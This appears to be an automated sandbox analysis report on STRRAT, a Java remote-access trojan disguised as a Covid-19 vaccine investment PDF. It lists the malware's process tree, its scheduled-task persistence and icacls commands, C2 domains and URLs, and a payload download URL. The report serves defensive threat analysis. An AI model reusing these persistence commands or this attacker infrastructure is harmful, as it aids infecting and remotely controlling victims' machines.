Analysis Report Covid19_Vacine_Investment_Proposals_1st_Quarter2021 pdf.jar

Overview

General Information

Sample Name: Covid19_Vacine_Investment_Proposals_1st_Quarter2021 pdf.jar
Analysis ID: 356987
MD5: 5435ec679cdd07fe6f4fc6f49a117ea8
SHA1: eab4494e7db4bcbebf9dc5c0197ce0081a6dda6e
SHA256: 5a962977909fafba0a1c202306068bd5f8297335b16989a07c1f119302155c84

Detection

STRRAT
Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected STRRAT
Connects to a pastebin service (likely for C&C)
Creates autostart registry keys to launch java
Creates multiple autostart registry keys
Exploit detected, runtime environment dropped PE file
Exploit detected, runtime environment starts unknown processes
Uses dynamic DNS services
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Allatori_JAR_Obfuscator
Contains capabilities to detect virtual machines
Contains functionality to query CPU information (cpuid)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the installed Java version
Queries the volume information (name, serial number etc) of a device
Stores files to the Windows start menu directory
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • cmd.exe (PID: 4952 cmdline: C:\Windows\system32\cmd.exe /c 7za.exe x -y -oC:\jar 'C:\Users\user\Desktop\Covid19_Vacine_Investment_Proposals_1st_Quarter2021 pdf.jar' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
    • 7za.exe (PID: 384 cmdline: 7za.exe x -y -oC:\jar 'C:\Users\user\Desktop\Covid19_Vacine_Investment_Proposals_1st_Quarter2021 pdf.jar' MD5: 77E556CDFDC5C592F5C46DB4127C6F4C)
    • conhost.exe (PID: 4904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • java.exe (PID: 6284 cmdline: 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -jar 'C:\Users\user\AppData\Roaming\plugins.jar' mp MD5: 28733BA8C383E865338638DF5196E6FE)
      • conhost.exe (PID: 6364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cmd.exe (PID: 4120 cmdline: 'C:\Windows\System32\cmd.exe' /c java.exe -jar 'C:\Users\user\Desktop\Covid19_Vacine_Investment_Proposals_1st_Quarter2021 pdf.jar' keuqzwqbvn.Mmwwrnygnfl >> C:\cmdlinestart.log 2>&1 MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
    • conhost.exe (PID: 5708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • java.exe (PID: 5544 cmdline: java.exe -jar 'C:\Users\user\Desktop\Covid19_Vacine_Investment_Proposals_1st_Quarter2021 pdf.jar' keuqzwqbvn.Mmwwrnygnfl MD5: 28733BA8C383E865338638DF5196E6FE)
      • icacls.exe (PID: 5980 cmdline: C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant 'everyone':(OI)(CI)M MD5: FF0D1D4317A44C951240FAE75075D501)
        • conhost.exe (PID: 384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • wscript.exe (PID: 5712 cmdline: wscript C:\Users\user\fukvowbkrs.js MD5: 7075DD7B9BE8807FCA93ACD86F724884)
        • javaw.exe (PID: 3164 cmdline: 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe' -jar 'C:\Users\user\AppData\Roaming\vmlpusjwhz.txt' MD5: 4BFEB2F64685DA09DEBB95FB981D4F65)
          • java.exe (PID: 720 cmdline: 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -jar 'C:\Users\user\vmlpusjwhz.txt' MD5: 28733BA8C383E865338638DF5196E6FE)
            • conhost.exe (PID: 5988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • cmd.exe (PID: 5848 cmdline: cmd /c schtasks /create /sc minute /mo 30 /tn Skype /tr 'C:\Users\user\AppData\Roaming\vmlpusjwhz.txt' MD5: F3BDBE3BB6F734E357235F4D5898582D)
              • conhost.exe (PID: 3096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
              • schtasks.exe (PID: 5312 cmdline: schtasks /create /sc minute /mo 30 /tn Skype /tr 'C:\Users\user\AppData\Roaming\vmlpusjwhz.txt' MD5: 15FF7D8324231381BAD48A052F85DF04)
            • java.exe (PID: 4952 cmdline: 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -jar 'C:\Users\user\AppData\Roaming\vmlpusjwhz.txt' MD5: 28733BA8C383E865338638DF5196E6FE)
  • notepad.exe (PID: 2596 cmdline: C:\Windows\system32\NOTEPAD.EXE C:\Users\user\AppData\Roaming\vmlpusjwhz.txt MD5: BB9A06B8F2DD9D24C77F389D7B2B58D2)
  • notepad.exe (PID: 6576 cmdline: 'C:\Windows\system32\NOTEPAD.EXE' C:\Users\user\AppData\Roaming\vmlpusjwhz.txt MD5: BB9A06B8F2DD9D24C77F389D7B2B58D2)
  • notepad.exe (PID: 7136 cmdline: 'C:\Windows\system32\NOTEPAD.EXE' C:\Users\user\AppData\Roaming\vmlpusjwhz.txt MD5: BB9A06B8F2DD9D24C77F389D7B2B58D2)
  • javaw.exe (PID: 4880 cmdline: 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe' -jar 'C:\Users\user\AppData\Roaming\plugins.jar' mp MD5: 4BFEB2F64685DA09DEBB95FB981D4F65)
  • notepad.exe (PID: 6504 cmdline: 'C:\Windows\system32\NOTEPAD.EXE' C:\Users\user\AppData\Roaming\vmlpusjwhz.txt MD5: BB9A06B8F2DD9D24C77F389D7B2B58D2)
  • javaw.exe (PID: 6568 cmdline: 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe' -jar 'C:\Users\user\AppData\Roaming\plugins.jar' mp MD5: 4BFEB2F64685DA09DEBB95FB981D4F65)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

Source: C:\jar\keuqzwqbvn\resources\umxybpjabc
Rule: SUSP_Base64_Encoded_Hex_Encoded_Code
Description: Detects hex encoded code that has been base64 encoded
Author: Florian Roth
Strings:
  • 0x34d:$x1: 78 34 4E 54 56 63 65 44 51 31 58 48 67
  • 0x35d:$x1: 78 34 4E 44 52 63 65 44 51 79 58 48 67
  • 0x36d:$x1: 78 34 4E 54 46 63 65 44 4E 46 58 48 67
  • 0x37d:$x1: 78 34 4E 44 42 63 65 44 51 7A 58 48 67
  • 0x39d:$x1: 78 34 4E 44 6C 63 65 44 4E 46 58 48 67
  • 0x3ad:$x1: 78 34 4E 44 42 63 65 44 52 42 58 48 67
  • 0x3bd:$x1: 78 34 4E 54 6D 63 65 44 55 32 58 48 67
  • 0x3cd:$x1: 78 34 4E 44 6C 63 65 44 4E 46 58 48 67
  • 0x3dd:$x1: 78 34 4E 44 42 63 65 44 4E 46 58 48 67
  • 0x3ed:$x1: 78 34 4E 44 42 63 65 44 4E 46 58 48 67
  • 0x3fd:$x1: 78 34 4E 44 42 63 65 44 4E 46 58 48 67
  • 0x40d:$x1: 78 34 4E 44 42 63 65 44 4E 46 58 48 67
  • 0x41d:$x1: 78 34 4E 44 42 63 65 44 4E 46 58 48 67
  • 0x42d:$x1: 78 34 4E 44 42 63 65 44 4E 46 58 48 67
  • 0x43d:$x1: 78 34 4E 44 42 63 65 44 4E 46 58 48 67
  • 0x44d:$x1: 78 34 4E 44 42 63 65 44 4E 46 58 48 67
  • 0x45d:$x1: 78 34 4E 44 42 63 65 44 4E 46 58 48 67
  • 0x46d:$x1: 78 34 4E 44 42 63 65 44 4E 46 58 48 67
  • 0x47d:$x1: 78 34 4E 44 42 63 65 44 4E 46 58 48 67
  • 0x48d:$x1: 78 34 4E 44 42 63 65 44 4E 46 58 48 67
  • 0x49d:$x1: 78 34 4E 44 42 63 65 44 4E 46 58 48 67
Source: C:\Users\user\fukvowbkrs.js
Rule: SUSP_Base64_Encoded_Hex_Encoded_Code
Description: Detects hex encoded code that has been base64 encoded
Author: Florian Roth
Strings:
  • 0x34d:$x1: 78 34 4E 54 56 63 65 44 51 31 58 48 67
  • 0x35d:$x1: 78 34 4E 44 52 63 65 44 51 79 58 48 67
  • 0x36d:$x1: 78 34 4E 54 46 63 65 44 4E 46 58 48 67
  • 0x37d:$x1: 78 34 4E 44 42 63 65 44 51 7A 58 48 67
  • 0x39d:$x1: 78 34 4E 44 6C 63 65 44 4E 46 58 48 67
  • 0x3ad:$x1: 78 34 4E 44 42 63 65 44 52 42 58 48 67
  • 0x3bd:$x1: 78 34 4E 54 6D 63 65 44 55 32 58 48 67
  • 0x3cd:$x1: 78 34 4E 44 6C 63 65 44 4E 46 58 48 67
  • 0x3dd:$x1: 78 34 4E 44 42 63 65 44 4E 46 58 48 67
  • 0x3ed:$x1: 78 34 4E 44 42 63 65 44 4E 46 58 48 67
  • 0x3fd:$x1: 78 34 4E 44 42 63 65 44 4E 46 58 48 67
  • 0x40d:$x1: 78 34 4E 44 42 63 65 44 4E 46 58 48 67
  • 0x41d:$x1: 78 34 4E 44 42 63 65 44 4E 46 58 48 67
  • 0x42d:$x1: 78 34 4E 44 42 63 65 44 4E 46 58 48 67
  • 0x43d:$x1: 78 34 4E 44 42 63 65 44 4E 46 58 48 67
  • 0x44d:$x1: 78 34 4E 44 42 63 65 44 4E 46 58 48 67
  • 0x45d:$x1: 78 34 4E 44 42 63 65 44 4E 46 58 48 67
  • 0x46d:$x1: 78 34 4E 44 42 63 65 44 4E 46 58 48 67
  • 0x47d:$x1: 78 34 4E 44 42 63 65 44 4E 46 58 48 67
  • 0x48d:$x1: 78 34 4E 44 42 63 65 44 4E 46 58 48 67
  • 0x49d:$x1: 78 34 4E 44 42 63 65 44 4E 46 58 48 67

Memory Dumps

Source: 00000018.00000002.521334832.000000000A810000.00000004.00000001.sdmp
Rule: JoeSecurity_STRRAT
Description: Yara detected STRRAT
Author: Joe Security

Source: 00000010.00000002.519763899.0000000004ECD000.00000004.00000001.sdmp
Rule: JoeSecurity_STRRAT
Description: Yara detected STRRAT
Author: Joe Security

Source: 00000010.00000002.517894566.0000000004DCD000.00000004.00000001.sdmp
Rule: JoeSecurity_STRRAT
Description: Yara detected STRRAT
Author: Joe Security

Source: 00000010.00000002.520726996.0000000009F9E000.00000004.00000001.sdmp
Rule: JoeSecurity_Allatori_JAR_Obfuscator
Description: Yara detected Allatori_JAR_Obfuscator
Author: Joe Security

Source: 00000027.00000002.352640886.000000000461D000.00000004.00000001.sdmp
Rule: JoeSecurity_Allatori_JAR_Obfuscator
Description: Yara detected Allatori_JAR_Obfuscator
Author: Joe Security

(23 entries in this table; the remaining entries are not shown here)

Sigma Overview

No Sigma rule has matched

Signature Overview

Compliance:

Uses new MSVCR Dlls
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe | File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
Uses secure TLS version for HTTPS connections
Source: unknown | HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.3:49721 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.3:49719 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.3:49720 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.3:49718 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.199.108.154:443 -> 192.168.2.3:49722 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.23.99.190:443 -> 192.168.2.3:49729 version: TLS 1.2

Software Vulnerabilities:

Exploit detected, runtime environment starts unknown processes
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe | Process created: C:\Windows\SysWOW64\wscript.exe

Networking:

Connects to a pastebin service (likely for C&C)
Source: unknown | DNS query: name: pastebin.com
Uses dynamic DNS services
Source: unknown | DNS query: name: pluginserver.duckdns.org
Source: unknown | DNS query: name: strizzz100.duckdns.org
Source: global traffic | TCP traffic: 192.168.2.3:49728 -> 107.175.144.243:4040
Source: global traffic | TCP traffic: 192.168.2.3:49732 -> 23.239.31.129:54557
Source: Joe Sandbox View | IP Address: 104.23.99.190
Source: Joe Sandbox View | IP Address: 104.23.99.190
Source: Joe Sandbox View | IP Address: 23.239.31.129
Source: Joe Sandbox View | ASN Name: LINODE-APLinodeLLCUS
Source: Joe Sandbox View | JA3 fingerprint: d2935c58fe676744fecc8614ee5356c7
Source: unknown | DNS traffic detected: queries for: repo1.maven.org
Source: java.exe, 0000000D.00000002.252198805.0000000005052000.00000004.00000001.sdmp, java.exe, 00000010.00000002.520685745.0000000009F96000.00000004.00000001.sdmp | String found in binary or memory: http://bugreport.sun.com/bugreport/
Source: javaw.exe, 0000000B.00000002.241108342.000000000A32F000.00000004.00000001.sdmp, javaw.exe, 0000000B.00000002.238111305.0000000004E79000.00000004.00000001.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceServerCA.crt
Source: javaw.exe, 0000000B.00000002.240730122.000000000A276000.00000004.00000001.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceServerCA.crt0
Source: javaw.exe, 0000000B.00000002.238279843.0000000004EEF000.00000004.00000001.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceServerCA.crt3
Source: javaw.exe, 0000000B.00000002.238111305.0000000004E79000.00000004.00000001.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceServerCA.crt;S
Source: javaw.exe, 0000000B.00000002.238100254.0000000004E6C000.00000004.00000001.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceServerCA.crtA
Source: javaw.exe, 0000000B.00000002.238100254.0000000004E6C000.00000004.00000001.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceServerCA.crtA0
Source: javaw.exe, 0000000B.00000002.238201447.0000000004EB6000.00000004.00000001.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceServerCA.crtCp3
Source: javaw.exe, 0000000B.00000002.238279843.0000000004EEF000.00000004.00000001.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceServerCA.crts
Source: javaw.exe, 0000000B.00000002.241108342.000000000A32F000.00000004.00000001.sdmp, javaw.exe, 0000000B.00000002.238201447.0000000004EB6000.00000004.00000001.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA.crt
Source: javaw.exe, 0000000B.00000002.238166814.0000000004EAC000.00000004.00000001.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA.crt0
Source: javaw.exe, 0000000B.00000002.238201447.0000000004EB6000.00000004.00000001.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA.crt3r3
Source: java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmp | String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html
Source: javaw.exe, 0000000B.00000002.239749123.000000000A126000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.253093640.00000000054CE000.00000004.00000001.sdmp, java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmp | String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
Source: java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmp | String found in binary or memory: http://crl.chambersign.org/chambersroot.crl
Source: javaw.exe, 0000000B.00000002.239749123.000000000A126000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.253093640.00000000054CE000.00000004.00000001.sdmp, java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmp | String found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
Source: java.exe, 0000000D.00000002.253093640.00000000054CE000.00000004.00000001.sdmp | String found in binary or memory: http://crl.chambersign.org/chambersroot.crlC5
Source: javaw.exe, 0000000B.00000002.239749123.000000000A126000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.253571843.000000000A727000.00000004.00000001.sdmp, java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl
Source: javaw.exe, 0000000B.00000002.239749123.000000000A126000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.253093640.00000000054CE000.00000004.00000001.sdmp, java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: javaw.exe, 0000000B.00000002.239749123.000000000A126000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.253571843.000000000A727000.00000004.00000001.sdmp, java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl
Source: javaw.exe, 0000000B.00000002.239749123.000000000A126000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.253093640.00000000054CE000.00000004.00000001.sdmp, java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmp | String found in binary or memory: http://crl.securetrust.com/STCA.crl
Source: javaw.exe, 0000000B.00000002.239749123.000000000A126000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.253093640.00000000054CE000.00000004.00000001.sdmp, java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmp | String found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: javaw.exe, 0000000B.00000002.239749123.000000000A126000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.253571843.000000000A727000.00000004.00000001.sdmp, java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmp | String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl
Source: javaw.exe, 0000000B.00000002.239749123.000000000A126000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.253093640.00000000054CE000.00000004.00000001.sdmp, java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmp | String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: javaw.exe, 0000000B.00000002.241108342.000000000A32F000.00000004.00000001.sdmp, javaw.exe, 0000000B.00000002.238201447.0000000004EB6000.00000004.00000001.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl
Source: javaw.exe, 0000000B.00000002.238166814.0000000004EAC000.00000004.00000001.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: javaw.exe, 0000000B.00000002.238111305.0000000004E79000.00000004.00000001.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crlK
Source: javaw.exe, 0000000B.00000002.238279843.0000000004EEF000.00000004.00000001.sdmp | String found in binary or memory: http://crl3.digicert.com/sha2-ha-server-g6.crl
Source: javaw.exe, 0000000B.00000002.240730122.000000000A276000.00000004.00000001.sdmp | String found in binary or memory: http://crl3.digicert.com/sha2-ha-server-g6.crl04
Source: javaw.exe, 0000000B.00000002.238100254.0000000004E6C000.00000004.00000001.sdmp | String found in binary or memory: http://crl3.digicert.com/sha2-ha-server-g6.crlA0
Source: javaw.exe, 0000000B.00000002.241108342.000000000A32F000.00000004.00000001.sdmp, javaw.exe, 0000000B.00000002.238201447.0000000004EB6000.00000004.00000001.sdmp | String found in binary or memory: http://crl3.digicert.com/ssca-sha2-g6.crl
Source: javaw.exe, 0000000B.00000002.238166814.0000000004EAC000.00000004.00000001.sdmp | String found in binary or memory: http://crl3.digicert.com/ssca-sha2-g6.crl0/
Source: javaw.exe, 0000000B.00000002.238201447.0000000004EB6000.00000004.00000001.sdmp | String found in binary or memory: http://crl3.digicert.com/ssca-sha2-g6.crlk
Source: javaw.exe, 0000000B.00000002.238111305.0000000004E79000.00000004.00000001.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl
Source: javaw.exe, 0000000B.00000002.238166814.0000000004EAC000.00000004.00000001.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl0=
Source: javaw.exe, 0000000B.00000002.241108342.000000000A32F000.00000004.00000001.sdmp, javaw.exe, 0000000B.00000002.238111305.0000000004E79000.00000004.00000001.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl
Source: javaw.exe, 0000000B.00000002.241025352.000000000A317000.00000004.00000001.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
Source: javaw.exe, 0000000B.00000002.241108342.000000000A32F000.00000004.00000001.sdmp | String found in binary or memory: http://crl4.digicert.com/sha2-ha-server-g6.crl
Source: javaw.exe, 0000000B.00000002.240730122.000000000A276000.00000004.00000001.sdmp | String found in binary or memory: http://crl4.digicert.com/sha2-ha-server-g6.crl0L
Source: javaw.exe, 0000000B.00000002.238201447.0000000004EB6000.00000004.00000001.sdmp | String found in binary or memory: http://crl4.digicert.com/sha2-ha-server-g6.crl;
Source: javaw.exe, 0000000B.00000002.238100254.0000000004E6C000.00000004.00000001.sdmp | String found in binary or memory: http://crl4.digicert.com/sha2-ha-server-g6.crlA
Source: javaw.exe, 0000000B.00000002.238201447.0000000004EB6000.00000004.00000001.sdmp | String found in binary or memory: http://crl4.digicert.com/sha2-ha-server-g6.crlk
Source: javaw.exe, 0000000B.00000002.241108342.000000000A32F000.00000004.00000001.sdmp, javaw.exe, 0000000B.00000002.238201447.0000000004EB6000.00000004.00000001.sdmp | String found in binary or memory: http://crl4.digicert.com/ssca-sha2-g6.crl
Source: javaw.exe, 0000000B.00000002.238166814.0000000004EAC000.00000004.00000001.sdmp | String found in binary or memory: http://crl4.digicert.com/ssca-sha2-g6.crl0L
Source: java.exe, 00000006.00000002.207053367.0000000004800000.00000004.00000001.sdmp, javaw.exe, 0000000B.00000002.238616990.0000000009FA2000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.253246566.000000000A5A2000.00000004.00000001.sdmp, java.exe, 00000010.00000002.520749260.0000000009FA0000.00000004.00000001.sdmp | String found in binary or memory: http://java.oracle.com/
Source: java.exe, 00000010.00000002.515417464.0000000004BAB000.00000004.00000001.sdmp | String found in binary or memory: http://jbfrost.live/strigoi/server/?hwid=1&lid=m&ht=5
Source: javaw.exe, 0000000B.00000003.228995438.00000000150EA000.00000004.00000001.sdmp, javaw.exe, 0000000B.00000002.239181413.000000000A03C000.00000004.00000001.sdmp, java.exe, 0000000D.00000003.248758362.0000000015676000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.253348649.000000000A630000.00000004.00000001.sdmp, java.exe, 00000010.00000003.277137784.0000000014FD2000.00000004.00000001.sdmp, java.exe, 00000010.00000002.521112026.000000000A02F000.00000004.00000001.sdmp | String found in binary or memory: http://null.oracle.com/
Source: javaw.exe, 0000000B.00000002.241108342.000000000A32F000.00000004.00000001.sdmp, javaw.exe, 0000000B.00000002.238111305.0000000004E79000.00000004.00000001.sdmp, javaw.exe, 0000000B.00000002.238201447.0000000004EB6000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.digicert.com
Source: javaw.exe, 0000000B.00000002.238166814.0000000004EAC000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: javaw.exe, 0000000B.00000002.238166814.0000000004EAC000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.digicert.com0F
Source: javaw.exe, 0000000B.00000002.241025352.000000000A317000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.digicert.com0K
Source: javaw.exe, 0000000B.00000002.240730122.000000000A276000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.digicert.com0M
Source: javaw.exe, 0000000B.00000002.238111305.0000000004E79000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.digicert.com3
Source: javaw.exe, 0000000B.00000002.238111305.0000000004E79000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.digicert.com;
Source: javaw.exe, 0000000B.00000002.238100254.0000000004E6C000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.digicert.comA0
Source: javaw.exe, 0000000B.00000002.238201447.0000000004EB6000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.digicert.comC
Source: javaw.exe, 0000000B.00000002.238111305.0000000004E79000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.digicert.comK
Source: javaw.exe, 0000000B.00000002.238279843.0000000004EEF000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.digicert.coms
Source: wscript.exe, 0000000A.00000003.214763026.0000000004F0D000.00000004.00000001.sdmp | String found in binary or memory: http://ops.com.pa/jre7.zip
Source: java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmp | String found in binary or memory: http://policy.camerfirma.com
Source: javaw.exe, 0000000B.00000002.239749123.000000000A126000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.253093640.00000000054CE000.00000004.00000001.sdmp, java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmp | String found in binary or memory: http://policy.camerfirma.com0
Source: java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmp | String found in binary or memory: http://repository.swisssign.com/
Source: javaw.exe, 0000000B.00000002.239749123.000000000A126000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.253093640.00000000054CE000.00000004.00000001.sdmp, java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmp | String found in binary or memory: http://repository.swisssign.com/0
Source: java.exe, 00000010.00000002.517894566.0000000004DCD000.00000004.00000001.sdmp | String found in binary or memory: http://str-master.pw
Source: java.exe, 00000010.00000002.517809140.0000000004DC1000.00000004.00000001.sdmp | String found in binary or memory: http://str-master.pw/strigoi/server/ping.php
Source: java.exe, 00000010.00000002.517894566.0000000004DCD000.00000004.00000001.sdmp | String found in binary or memory: http://str-master.pw/strigoi/server/ping.php?
Source: java.exe, 00000010.00000002.517809140.0000000004DC1000.00000004.00000001.sdmp | String found in binary or memory: http://str-master.pw/strigoi/server/ping.php?lid=
Source: java.exe, 00000010.00000002.517894566.0000000004DCD000.00000004.00000001.sdmp, java.exe, 00000010.00000002.517809140.0000000004DC1000.00000004.00000001.sdmp | String found in binary or memory: http://str-master.pw/strigoi/server/ping.php?lid=RUGR-ATSN-D14P-VBXX-49LW
Source: java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmp | String found in binary or memory: http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl
Source: javaw.exe, 0000000B.00000002.242664932.000000001582F000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.253093640.00000000054CE000.00000004.00000001.sdmp, java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmp | String found in binary or memory: http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl0
Source: javaw.exe, 0000000B.00000002.238594494.0000000009FA0000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.253231810.000000000A5A0000.00000004.00000001.sdmp, java.exe, 00000010.00000002.520726996.0000000009F9E000.00000004.00000001.sdmp | String found in binary or memory: http://www.allatori.com
Source: javaw.exe, 0000000B.00000002.240871910.000000000A2CE000.00000004.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/
Source: java.exe, 0000000D.00000003.248758362.0000000015676000.00000004.00000001.sdmp, java.exe, 00000010.00000003.277137784.0000000014FD2000.00000004.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.txt
Source: java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmp | String found in binary or memory: http://www.certplus.com/CRL/class2.crl
Source: javaw.exe, 0000000B.00000002.242664932.000000001582F000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.253093640.00000000054CE000.00000004.00000001.sdmp, java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmp | String found in binary or memory: http://www.certplus.com/CRL/class2.crl0
Source: java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmp | String found in binary or memory: http://www.certplus.com/CRL/class3P.crl
Source: javaw.exe, 0000000B.00000002.239749123.000000000A126000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.253093640.00000000054CE000.00000004.00000001.sdmp, java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmp | String found in binary or memory: http://www.certplus.com/CRL/class3P.crl0
Source: javaw.exe, 0000000B.00000002.240871910.000000000A2CE000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.253571843.000000000A727000.00000004.00000001.sdmp, java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmp | String found in binary or memory: http://www.chambersign.org
Source: javaw.exe, 0000000B.00000002.239749123.000000000A126000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.253093640.00000000054CE000.00000004.00000001.sdmp, java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmp | String found in binary or memory: http://www.chambersign.org1
